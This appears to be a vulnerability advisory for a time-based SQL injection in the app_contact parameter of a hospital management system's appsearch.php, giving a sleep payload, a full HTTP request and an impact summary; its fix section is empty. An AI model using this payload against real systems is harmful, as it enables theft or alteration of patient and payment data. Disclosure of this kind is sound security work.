SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd March 21, 2021, 
allows attackers to sql commands via app_contact parameter on /appsearch.php directory.

How to exploit

URL: <http://localhost/Hospital-Management-System/appsearch.php>
Parameter: app_contact
Payload: '%2b(select*from(select(sleep(20)))a)%2b'

HTTP Request:

POST /Hospital/appsearch.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: <>
Connection: close
Referer: <>
Cookie: PHPSESSID=rllrv34sf52l6ff6p36ahq7eki
Upgrade-Insecure-Requests: 1


the server will sleep for 20 seconds.

Screenshot for PoC:



Github permalink


Impact for this vulnerability:

Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive company data stored on the SQL server. Compromise Users' Privacy: Depending on the data stored on the SQL server, an attack can expose private user data, such as credit card numbers.

How to fix this vulnerability: